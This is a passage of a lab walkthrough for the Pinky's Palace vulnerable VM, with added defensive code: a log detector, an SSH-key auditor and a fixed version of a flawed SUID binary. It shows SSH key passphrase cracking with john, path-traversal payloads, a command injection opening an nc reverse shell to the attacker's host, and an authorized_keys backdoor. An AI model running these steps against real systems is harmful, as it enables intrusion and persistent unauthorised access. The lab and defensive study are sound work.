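    %2e%2e%2f and double-encoded %252e variants are caught as well."""
    hits = []
    for e in entries:
        decoded = unquote(unquote(e["target"]))
        query = decoded.partition("?")[2]
        values = [kv.partition("=")[2] for kv in query.split("&") if kv]
        if any("../" in v or "..\\" in v or v.startswith("/") for v in values):
            hits.append((e["ip"], e["target"]))
    return hits


def analyse(lines):
    entries = [e for e in map(parse_line, lines) if e]
    return {"bursts": login_bursts(entries), "traversal": traversal_hits(entries)}


def constructed_log():
    """Constructed sample: one normal visitor and one host replaying what the
    write-up did (hydra burst, then LFI probing). IPs and times are made up."""
    base = datetime(2021, 3, 1, 17, 27, 2, tzinfo=timezone.utc)
    fmt = '%s - - [%s] "%s %s HTTP/1.1" %d 512 "-" "%s"'
    lines = []

    def add(ip, offset_s, method, target, ua, status=200):
        ts = (base + timedelta(seconds=offset_s)).strftime("%d/%b/%Y:%H:%M:%S %z")
        lines.append(fmt % (ip, ts, method, target, status, ua))

    add("192.168.2.50", 0, "GET", "/", "Mozilla/5.0")
    add("192.168.2.50", 5, "GET", "/login.php", "Mozilla/5.0")
    add("192.168.2.50", 30, "POST", "/login.php", "Mozilla/5.0")
    for i in range(25):                       # 25 POSTs in about three seconds
        add("192.168.2.100", 40 + i * 0.12, "POST", "/login.php", "Mozilla/5.0 (Hydra)")
    add("192.168.2.100", 120, "GET", "/pageegap.php?1337=filesselif1001.php", "curl/7.74.0")
    add("192.168.2.100", 121, "GET", "/pageegap.php?1337=../../../../etc/passwd", "curl/7.74.0")
    add("192.168.2.100", 122, "GET", "/pageegap.php?1337=%252e%252e%2fetc%2fpasswd", "curl/7.74.0")
    add("192.168.2.100", 123, "GET", "/pageegap.php?1337=/etc/passwd", "curl/7.74.0")
    return lines


if __name__ == "__main__":
    print(analyse(constructed_log()))
```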

What if we just try to crack the password on that key? Maybe it’s really weak?
I’ve never tried this before so, quick search:
- https://null-byte.wonderhowto.com/how-to/crack-ssh-private-key-passwords-with-john-ripper-0302810/
- ‘in Kali you’ll find it there /usr/share/john/ssh2john.py.’

$ python /usr/share/john/ssh2john.py id_rsa > id_rsa.hash

I dropped the hash into crackstation… and it doesn’t like the format. Oh well, let’s try the suggested method first:

$ john --wordlist=/usr/share/wordlists/rockyou.txt  id_rsa.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
secretz101       (id_rsa)
Warning: Only 2 candidates left, minimum 8 needed for performance.
1g 0:00:00:02 DONE (2021-03-01 18:02) 0.4672g/s 6701Kp/s 6701Kc/s 6701KC/sa6_123..*7¡Vamos!
Session completed

Nice!!!
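The reason this cracked in two seconds is visible in john's own output: Cost 1 is 0 (MD5/AES) and Cost 2 is 1 iteration, i.e. the legacy PEM key format whose encryption key is a single MD5 pass over the passphrase. Added here as an auditing example (not part of the write-up), this Python script reports a key file's format, cipher, KDF and round count so weak keys can be found before someone else does; the sample keys are constructed and carry no real key material, and the round threshold of 16 is ssh-keygen's default for `-a`.

```python
"""Inspect an SSH private key and report how (or whether) its passphrase is protected.

Added example. Legacy "-----BEGIN RSA PRIVATE KEY-----" files signal encryption with
RFC 1421 headers (Proc-Type / DEK-Info) and derive the key with one MD5 iteration;
openssh-key-v1 files carry cipher, KDF name and bcrypt round count in the blob itself.
Sample keys below are constructed and contain no key material."""
import base64
import struct


def _read_string(buf, off):
    """Read one SSH wire-format string (uint32 big-endian length + bytes)."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def inspect_key(pem_text):
    lines = [ln.strip() for ln in pem_text.strip().splitlines() if ln.strip()]
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(lines[1:-1]))
        magic = b"openssh-key-v1\x00"
        if not blob.startswith(magic):
            raise ValueError("not an openssh-key-v1 blob")
        # Only the leading fields are read; public/private key sections follow them.
        cipher, off = _read_string(blob, len(magic))
        kdf, off = _read_string(blob, off)
        kdfopts, off = _read_string(blob, off)
        rounds = None
        if kdf == b"bcrypt":                      # kdfoptions = string salt, uint32 rounds
            _salt, o = _read_string(kdfopts, 0)
            (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
        return {"format": "openssh-key-v1", "cipher": cipher.decode(),
                "kdf": kdf.decode(), "rounds": rounds}
    # Legacy PEM: headers (if any) sit between the BEGIN line and the base64 body.
    headers = {}
    for ln in lines[1:-1]:
        if ":" in ln:                             # base64 never contains ':'
            k, _, v = ln.partition(":")
            headers[k.strip()] = v.strip()
    if headers.get("Proc-Type") == "4,ENCRYPTED":
        cipher = headers.get("DEK-Info", "?").split(",")[0]
        return {"format": "legacy-pem", "cipher": cipher, "kdf": "md5", "rounds": 1}
    return {"format": "legacy-pem", "cipher": "none", "kdf": "none", "rounds": None}


def verdict(info, min_rounds=16):
    """'unprotected', 'weak' (cheap offline guessing) or 'ok'."""
    if info["cipher"] == "none":
        return "unprotected"
    if info["kdf"] == "bcrypt" and info["rounds"] is not None and info["rounds"] >= min_rounds:
        return "ok"
    return "weak"


def build_openssh_key(cipher=b"aes256-ctr", kdf=b"bcrypt", rounds=16):
    """Constructed openssh-key-v1 header (cipher/KDF fields only, no key data)."""
    def s(b):
        return struct.pack(">I", len(b)) + b
    kdfopts = (s(b"\x00" * 16) + struct.pack(">I", rounds)) if kdf == b"bcrypt" else b""
    blob = b"openssh-key-v1\x00" + s(cipher) + s(kdf) + s(kdfopts)
    b64 = base64.b64encode(blob).decode()
    return "-----BEGIN OPENSSH PRIVATE KEY-----\n" + b64 + "\n-----END OPENSSH PRIVATE KEY-----\n"


# Constructed legacy encrypted key: real headers, dummy base64 body.
LEGACY_ENCRYPTED = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF

QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo=
-----END RSA PRIVATE KEY-----
"""

if __name__ == "__main__":
    for name, key in [("legacy", LEGACY_ENCRYPTED), ("openssh", build_openssh_key())]:
        info = inspect_key(key)
        print(name, info, verdict(info))
```

An existing key is moved to the bcrypt-protected format with `ssh-keygen -p -o -a 100 -f id_rsa` (the round count is the cost the cracker has to pay per guess).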

Now we should be able to ssh:

$ ssh stefano@192.168.2.24 -i ./id_rsa -p 4655
Enter passphrase for key './id_rsa': 
Linux Pinkys-Palace 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Mar 17 21:18:01 2018 from 172.19.19.2
stefano@Pinkys-Palace:~$ id
uid=1002(stefano) gid=1002(stefano) groups=1002(stefano)

Wohoo!!

Post-Exploitation

Alright, let’s poke around shall we?!

stefano@Pinkys-Palace:~$ ls -al
total 32
drwxr-xr-x 4 stefano stefano 4096 Mar 17  2018 .
drwxr-xr-x 5 root    root    4096 Mar 17  2018 ..
-rw------- 1 stefano stefano  273 Mar 17  2018 .bash_history
-rw-r--r-- 1 stefano stefano  220 May 15  2017 .bash_logout
-rw-r--r-- 1 stefano stefano 3526 May 15  2017 .bashrc
-rw-r--r-- 1 stefano stefano  675 May 15  2017 .profile
drwx------ 2 stefano stefano 4096 Mar 17  2018 .ssh
drwxr-xr-x 2 stefano stefano 4096 Mar 17  2018 tools
stefano@Pinkys-Palace:~$ ls -al ./tools/
total 28
drwxr-xr-x 2 stefano stefano   4096 Mar 17  2018 .
drwxr-xr-x 4 stefano stefano   4096 Mar 17  2018 ..
-rw-r--r-- 1 stefano stefano     65 Mar 16  2018 note.txt
-rwsr----x 1 pinky   www-data 13384 Mar 16  2018 qsub
stefano@Pinkys-Palace:~$ ./tools/qsub
./tools/qsub <Message>
stefano@Pinkys-Palace:~$ ./tools/qsub l
[+] Input Password: 

^C
stefano@Pinkys-Palace:~$ ./tools/qsub l;ls
[+] Input Password: 
^C
stefano@Pinkys-Palace:~$ ./tools/qsub l;ls
[+] Input Password: ls
[!] Incorrect Password!
tools

stefano@Pinkys-Palace:~/tools$ sudo -l
bash: sudo: command not found

stefano@Pinkys-Palace:~$ cat .bash_history
ls
cd tools/
lsd
ls
cd /usr/local/bin
ls
ls -al
cat backup.sh 
cd /home
ls -al
cd pinky/
cd demon/
cd /daemon/
cd /root
gdb
su
cd t
cd
cd tools/
ls -al
cat qsub
strings qsub 
./qsub 
./qsub Testing./qsub 
env
./qsub Testingenv
su
cleart
env
./qsub Test!
su
ls -al
su pinky

stefano@Pinkys-Palace:/$ ps -aux | grep root
root          1  0.0  0.3 138900  6672 ?        Ss   12:46   0:00 /sbin/init
root          2  0.0  0.0      0     0 ?        S    12:46   0:00 [kthreadd]
root          3  0.0  0.0      0     0 ?        S    12:46   0:00 [ksoftirqd/0]
root          5  0.0  0.0      0     0 ?        S<   12:46   0:00 [kworker/0:0H]
root          7  0.0  0.0      0     0 ?        S    12:46   0:00 [rcu_sched]
root          8  0.0  0.0      0     0 ?        S    12:46   0:00 [rcu_bh]
root          9  0.0  0.0      0     0 ?        S    12:46   0:00 [migration/0]
root         10  0.0  0.0      0     0 ?        S<   12:46   0:00 [lru-add-drain]
root         11  0.0  0.0      0     0 ?        S    12:46   0:00 [watchdog/0]
root         12  0.0  0.0      0     0 ?        S    12:46   0:00 [cpuhp/0]
root         13  0.0  0.0      0     0 ?        S    12:46   0:00 [cpuhp/1]
root         14  0.0  0.0      0     0 ?        S    12:46   0:00 [watchdog/1]
root         15  0.0  0.0      0     0 ?        S    12:46   0:00 [migration/1]
root         16  0.0  0.0      0     0 ?        S    12:46   0:00 [ksoftirqd/1]
root         18  0.0  0.0      0     0 ?        S<   12:46   0:00 [kworker/1:0H]
root         19  0.0  0.0      0     0 ?        S    12:46   0:00 [kdevtmpfs]
root         20  0.0  0.0      0     0 ?        S<   12:46   0:00 [netns]
root         21  0.0  0.0      0     0 ?        S    12:46   0:00 [khungtaskd]
root         22  0.0  0.0      0     0 ?        S    12:46   0:00 [oom_reaper]
root         23  0.0  0.0      0     0 ?        S<   12:46   0:00 [writeback]
root         24  0.0  0.0      0     0 ?        S    12:46   0:00 [kcompactd0]
root         26  0.0  0.0      0     0 ?        SN   12:46   0:00 [ksmd]
root         27  0.0  0.0      0     0 ?        SN   12:46   0:00 [khugepaged]
root         28  0.0  0.0      0     0 ?        S<   12:46   0:00 [crypto]
root         29  0.0  0.0      0     0 ?        S<   12:46   0:00 [kintegrityd]
root         30  0.0  0.0      0     0 ?        S<   12:46   0:00 [bioset]
root         31  0.0  0.0      0     0 ?        S<   12:46   0:00 [kblockd]
root         32  0.0  0.0      0     0 ?        S<   12:46   0:00 [devfreq_wq]
root         33  0.0  0.0      0     0 ?        S<   12:46   0:00 [watchdogd]
root         34  0.0  0.0      0     0 ?        S    12:46   0:00 [kswapd0]
root         35  0.0  0.0      0     0 ?        S<   12:46   0:00 [vmstat]
root         47  0.0  0.0      0     0 ?        S<   12:46   0:00 [kthrotld]
root         49  0.0  0.0      0     0 ?        S<   12:46   0:00 [ipv6_addrconf]
root         93  0.0  0.0      0     0 ?        S<   12:46   0:00 [ata_sff]
root         94  0.0  0.0      0     0 ?        S    12:46   0:00 [scsi_eh_0]
root         95  0.0  0.0      0     0 ?        S<   12:46   0:00 [scsi_tmf_0]
root         96  0.0  0.0      0     0 ?        S    12:46   0:00 [scsi_eh_1]
root         97  0.0  0.0      0     0 ?        S<   12:46   0:00 [scsi_tmf_1]
root         98  0.0  0.0      0     0 ?        S    12:46   0:00 [kworker/u256:1]
root        100  0.0  0.0      0     0 ?        S<   12:46   0:00 [mpt_poll_0]
root        101  0.0  0.0      0     0 ?        S<   12:46   0:00 [mpt/0]
root        128  0.0  0.0      0     0 ?        S    12:46   0:00 [scsi_eh_2]
root        129  0.0  0.0      0     0 ?        S<   12:46   0:00 [scsi_tmf_2]
root        130  0.0  0.0      0     0 ?        S<   12:46   0:00 [bioset]
root        147  0.0  0.0      0     0 ?        S<   12:46   0:00 [kworker/0:1H]
root        148  0.0  0.0      0     0 ?        S<   12:46   0:00 [kworker/1:1H]
root        181  0.0  0.0      0     0 ?        S    12:46   0:00 [jbd2/sda1-8]
root        182  0.0  0.0      0     0 ?        S<   12:46   0:00 [ext4-rsv-conver]
root        210  0.0  0.2  51188  5440 ?        Ss   12:46   0:00 /lib/systemd/systemd-journald
root        216  0.0  0.0      0     0 ?        S    12:46   0:00 [kauditd]
root        217  0.0  0.0      0     0 ?        S    12:46   0:02 [kworker/0:2]
root        234  0.0  0.2  47576  5584 ?        Ss   12:46   0:00 /lib/systemd/systemd-udevd
root        298  0.0  0.0      0     0 ?        S<   12:46   0:00 [ttm_swap]
root        300  0.0  0.0      0     0 ?        S<   12:46   0:00 [nfit]
root        446  0.0  0.1  29664  2828 ?        Ss   12:46   0:00 /usr/sbin/cron -f
root        447  0.0  0.2  46420  4796 ?        Ss   12:46   0:00 /lib/systemd/systemd-logind
root        450  0.0  0.1 250116  3128 ?        Ssl  12:46   0:00 /usr/sbin/rsyslogd -n
root        466  0.0  1.3 235880 26628 ?        Ss   12:46   0:00 php-fpm: master process (/etc/php/7.0/fpm/php-fpm.conf)
root        468  0.0  0.0   4040   988 ?        Ss   12:46   0:00 /daemon/panel
root        473  0.0  0.0  14536  1792 tty1     Ss+  12:46   0:00 /sbin/agetty --noclear tty1 linux
root        481  0.0  0.3  69944  6252 ?        Ss   12:46   0:00 /usr/sbin/sshd -D
root        504  0.0  0.0 159504  1680 ?        Ss   12:46   0:00 nginx: master process /usr/sbin/nginx -g daemon on; master_process on;
root        507  0.0  1.2 275792 25800 ?        Ss   12:46   0:00 /usr/sbin/apache2 -k start
root        515  0.0  0.0  20472  1044 ?        Ss   12:46   0:00 /sbin/dhclient -4 -v -pf /run/dhclient.ens33.pid -lf /var/lib/dhcp/dhclient.ens33.leases -I -df /var/lib/dhcp/dhclient6.ens33.leases ens33
root        534  0.0  0.1   8572  3992 ?        Ss   12:46   0:00 /usr/sbin/knockd -i ens33
root        933  0.0  0.0      0     0 ?        S    13:39   0:00 [kworker/1:0]
root        972  0.0  0.0   4040    84 ?        S    13:53   0:00 /daemon/panel
root       1063  0.0  0.0      0     0 ?        S    14:09   0:00 [kworker/1:2]
root       1209  0.0  0.0      0     0 ?        S    14:39   0:00 [kworker/u256:2]
root       1211  0.0  0.0      0     0 ?        S    14:39   0:00 [kworker/0:1]
root       1247  0.0  0.3  95172  6884 ?        Ss   15:03   0:00 sshd: stefano [priv]
root       1374  0.0  0.0      0     0 ?        S    15:09   0:00 [kworker/u256:0]
root       1376  0.0  0.0      0     0 ?        S    15:09   0:00 [kworker/0:0]
stefano    1425  0.0  0.0  12784   984 pts/0    S+   15:12   0:00 grep roo

stefano@Pinkys-Palace:/$ mysql -u pinkywp -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 45006
Server version: 10.1.26-MariaDB-0+deb9u1 Debian 9.1

Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> connect pwp_db
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Connection id:    45007
Current database: pwp_db

MariaDB [pwp_db]> show tables;
+-----------------------+
| Tables_in_pwp_db      |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
12 rows in set (0.00 sec)

MariaDB [pwp_db]> select * from wp_users;
+----+------------+------------------------------------+---------------+---------------------+----------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass                          | user_nicename | user_email          | user_url | user_registered     | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+---------------------+----------+---------------------+---------------------+-------------+--------------+
|  1 | pinky1337  | $P$BqBoittC5WZl0XUL8GVKO1t9R6HcJU/ | pinky1337     | [email protected] |          | 2018-03-17 22:58:07 |                     |           0 | pinky1337    |
+----+------------+------------------------------------+---------------+---------------------+----------+---------------------+---------------------+-------------+--------------+
1 row in set (0.00 sec)

# Meh even if I crack it, I doubt it's re-used

stefano@Pinkys-Palace:/$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
stefano@Pinkys-Palace:/$ env
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:
SSH_CONNECTION=192.168.2.23 40624 192.168.2.24 4655
LANG=en_US.UTF-8
XDG_SESSION_ID=34
USER=stefano
PWD=/
HOME=/home/stefano
SSH_CLIENT=192.168.2.23 40624 4655
SSH_TTY=/dev/pts/0
MAIL=/var/mail/stefano
SHELL=/bin/bash
TERM=xterm-256color
SHLVL=2
LOGNAME=stefano
XDG_RUNTIME_DIR=/run/user/1002
PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
_=/usr/bin/env
OLDPWD=/tmp

stefano@Pinkys-Palace:/etc$ ls -al | grep cron
drwxr-xr-x  2 root root    4096 Mar 17  2018 cron.d
drwxr-xr-x  2 root root    4096 Mar 17  2018 cron.daily
drwxr-xr-x  2 root root    4096 Mar 17  2018 cron.hourly
drwxr-xr-x  2 root root    4096 Mar 17  2018 cron.monthly
-rw-r--r--  1 root root     722 May  3  2015 crontab
drwxr-xr-x  2 root root    4096 Mar 17  2018 cron.weekly

stefano@Pinkys-Palace:/etc$ cat crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

I noticed that the suid file is owned by www-data, and in history the lad ran strings on it which may be a hint:
Okay…

Let’s try to get a closer look:

$ curl http://pinkydb:7654/pageegap.php?1337=/home/stefano/tools/qsub --output qsub
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 13384    0 13384    0     0  12.7M      0 --:--:-- --:--:-- --:--:-- 12.7M

$ strings qsub
/lib64/ld-linux-x86-64.so.2
libc.so.6
exit
__isoc99_scanf
puts
strlen
send
setresgid
asprintf
getenv
setresuid
system
getegid
geteuid
__cxa_finalize
strcmp
__libc_start_main
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
GLIBC_2.7
GLIBC_2.2.5
AWAVA
AUATL
[]A\A]A^A_
/bin/echo %s >> /home/pinky/messages/stefano_msg.txt
%s <Message>
TERM
[+] Input Password: 
Bad hacker! Go away!
[+] Welcome to Question Submit!
[!] Incorrect Password!
;*3$"
GCC: (Debian 6.3.0-18+deb9u1) 6.3.0 20170516
crtstuff.c
__JCR_LIST__
deregister_tm_clones
__do_global_dtors_aux
completed.6972
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
qsub.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
[email protected]@GLIBC_2.2.5
_ITM_deregisterTMCloneTable
[email protected]@GLIBC_2.2.5
[email protected]@GLIBC_2.2.5
_edata
[email protected]@GLIBC_2.2.5
[email protected]@GLIBC_2.2.5
[email protected]@GLIBC_2.2.5
[email protected]@GLIBC_2.2.5
[email protected]@GLIBC_2.2.5
__data_start
[email protected]@GLIBC_2.2.5
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
[email protected]@GLIBC_2.2.5
__bss_start
[email protected]@GLIBC_2.2.5
main
_Jv_RegisterClasses
[email protected]@GLIBC_2.7
[email protected]@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
[email protected]@GLIBC_2.2.5
send
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got.plt
.data
.bss
.comment

I think this section is strange: why is TERM there? This is where I’d expect to see the comparison string that the password gets matched against:

TERM
[+] Input Password: 
Bad hacker! Go away!
[+] Welcome to Question Submit!
[!] Incorrect Password!
┌──(kali㉿kali)-[~/Downloads]
└─$ ./qsub l
[+] Input Password: $TERM
[!] Incorrect Password!
                                                                                                                                                                                      
┌──(kali㉿kali)-[~/Downloads]
└─$ echo $TERM
xterm-256color
                                                                                                                                                                                      
┌──(kali㉿kali)-[~/Downloads]
└─$ ./qsub l  
[+] Input Password: t
[!] Incorrect Password!
                                                                                                                                                                                      
┌──(kali㉿kali)-[~/Downloads]
└─$ ./qsub l
[+] Input Password: xterm-256color
sh: 1: cannot create /home/pinky/messages/stefano_msg.txt: Directory nonexistent
[+] Welcome to Question Submit!

HA! Okay, back on the system:

stefano@Pinkys-Palace:~/tools$ ./qsub  hi
[+] Input Password: xterm-256color
[+] Welcome to Question Submit!

stefano@Pinkys-Palace:~/tools$ ./qsub  'hi;id'
[+] Input Password: xterm-256color
hi
[+] Welcome to Question Submit!

$ ./qsub  'hi;/bin/id'
[+] Input Password: xterm-256color
hi
sh: 1: /bin/id: not found
[+] Welcome to Question Submit!

stefano@Pinkys-Palace:~/tools$ TERM=1
stefano@Pinkys-Palace:~/tools$ ./qsub 'hi;nc -e /bin/sh 192.168.2.23 4444'
[+] Input Password: 1
hi

$ nc -lvp 4444
listening on [any] 4444 ...
ls
connect to [192.168.2.23] from pinkydb [192.168.2.24] 39386
note.txt
qsub
ls
note.txt
qsub
id
uid=1000(pinky) gid=1002(stefano) groups=1002(stefano)
python -c 'import pty; pty.spawn("/bin/bash")'
pinky@Pinkys-Palace:~/tools$ cd /home/pinky
cd /home/pinky
pinky@Pinkys-Palace:/home/pinky$ cd .ssh
cd .ssh
bash: cd: .ssh: No such file or directory
pinky@Pinkys-Palace:/home/pinky$ mkdir .ssh
mkdir .ssh
pinky@Pinkys-Palace:/home/pinky$ echo "ssh-rsa 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 [email protected]" > .ssh/authorized_keys
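What the strings output and the tests above add up to is two separate defects in qsub: the message is interpolated into a shell command line that goes to system(), and the "password" is read from TERM, which the caller of a SUID binary sets for itself. The following is an added example written for this write-up, not the qsub source from the box: it reconstructs that pattern so the injected command can be inspected without running it, and puts a version beside it that appends the message with stdio and needs no shell at all. The command format string, the file path and the use of getenv("TERM") are taken from the strings output; the function names and the overall layout are my assumptions.

```c
/* Added example, not the qsub source from the box: a reconstruction of the two
 * defects the strings output and the tests above imply (the command format
 * string and the getenv("TERM") "password" come from the strings output; the
 * function names and layout are my assumptions), beside a version that needs
 * no shell. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Path and format seen in the strings output of qsub. */
#define MSG_FILE "/home/pinky/messages/stefano_msg.txt"
#define CMD_FMT  "/bin/echo %s >> " MSG_FILE

/* Vulnerable pattern: interpolate the message into a shell command line. The
 * binary hands the result to system(); here it is only returned (caller frees)
 * so the injected form can be inspected without executing it. */
char *vuln_build_command(const char *msg) {
    int n = snprintf(NULL, 0, CMD_FMT, msg);
    if (n < 0) return NULL;
    char *cmd = malloc((size_t)n + 1);
    if (!cmd) return NULL;
    snprintf(cmd, (size_t)n + 1, CMD_FMT, msg);
    return cmd;
}

/* Vulnerable check: the "password" is whatever TERM holds, and whoever runs a
 * SUID binary chooses its environment, so this gates nothing. */
int vuln_check_password(const char *supplied) {
    const char *pw = getenv("TERM");
    return pw != NULL && strcmp(pw, supplied) == 0;
}

/* Count the characters a POSIX shell uses to end or chain a command; any of
 * them inside a message is exactly what the 'hi;id' test above relies on. */
int count_shell_metachars(const char *msg) {
    int n = 0;
    for (const char *p = msg; *p; p++)
        if (strchr(";|&`$()<>\n", *p)) n++;
    return n;
}

/* Fixed version: append with stdio instead of a shell, so ';' is just a byte
 * of the message. Reject line breaks so one call cannot forge several entries.
 * Returns 0 on success, -1 on refusal or I/O error. */
int safe_append_message(const char *path, const char *msg) {
    for (const char *p = msg; *p; p++)
        if (*p == '\n' || *p == '\r') return -1;
    FILE *f = fopen(path, "a");
    if (!f) return -1;
    int rc = (fputs(msg, f) == EOF || fputc('\n', f) == EOF) ? -1 : 0;
    if (fclose(f) != 0) rc = -1;
    return rc;
}

int main(void) {
    char *cmd = vuln_build_command("hi;id");
    printf("command the vulnerable path would run: %s\n", cmd);
    printf("shell metacharacters in message: %d\n", count_shell_metachars("hi;id"));
    /* /tmp path is a constructed stand-in for the real messages file */
    printf("safe append: %d\n", safe_append_message("/tmp/qsub_example_msg.txt", "hi;id"));
    free(cmd);
    return 0;
}
```

The fix is not to escape the message but to never start a shell: with fopen/fputs there is no command line for a `;` to split. The strings also show setresuid/setresgid, so the real binary does switch identity; a SUID helper that must gate on a secret cannot take that secret from its own environment, since that is the one thing the unprivileged caller fully controls.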


$ ssh [email protected] -p 4655                        
Linux Pinkys-Palace 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law

pinky@Pinkys-Palace:/$ find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
-rwsr----x 1 pinky www-data 13384 Mar 16  2018 /home/stefano/tools/qsub
-rwsr-xr-x 1 root root 40504 May 17  2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 40312 May 17  2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 59680 May 17  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 75792 May 17  2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 50040 May 17  2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 440728 Mar  1  2018 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 42992 Mar  2  2018 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 40536 May 17  2017 /bin/su
-rwsr-xr-x 1 root root 44304 Mar  7  2018 /bin/mount
-rwsr-xr-x 1 root root 31720 Mar  7  2018 /bin/umount
-rwsr-xr-x 1 root root 61240 Nov  9  2016 /bin/ping
pinky@Pinkys-Palace:/$ find / -uid 0 -perm -4000 -type f 2>/dev/null
